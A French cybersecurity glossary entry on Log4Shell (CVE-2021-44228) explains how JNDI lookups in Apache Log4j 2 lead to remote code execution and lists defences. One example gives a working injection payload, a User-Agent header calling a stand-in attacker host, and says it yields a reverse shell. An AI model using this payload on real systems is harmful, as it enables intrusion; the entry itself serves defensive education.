CyberGlossary

Vulnérabilités

Log4Shell (CVE-2021-44228)

Aussi appelé: CVE-2021-44228, Vulnérabilité Log4j

Définition

Vulnérabilité critique d'exécution de code à distance d'Apache Log4j 2 révélée en décembre 2021, déclenchable simplement en faisant journaliser une chaîne JNDI.

Log4Shell est une vulnérabilité CVSS 10.0 d'Apache Log4j 2 (versions 2.0-beta9 à 2.14.1) divulguée en décembre 2021. La fonction de message lookup évaluait des chaînes ${jndi:ldap://...} dans les logs, conduisant la JVM à télécharger et désérialiser une classe Java distante — donc à exécuter du code à distance. Comme Log4j est embarqué dans d'innombrables applications et appliances Java, toute entrée parvenant à un log (User-Agent, champ de recherche, nom de fichier) devenait un vecteur. Elle a déclenché un effort mondial de patch d'urgence et figure parmi les zero-days les plus exploités. Défenses : mettre à jour Log4j vers 2.17.1+, désactiver les lookups JNDI, bloquer la sortie réseau, utiliser des SBOM pour repérer les composants vulnérables.

Exemples

  • Envoyer User-Agent: ${jndi:ldap://attacker.com/x} à une application Java et obtenir un reverse shell.
  • Exploiter un service Java interne en journalisant une valeur malveillante saisie dans un champ utilisateur.

Termes liés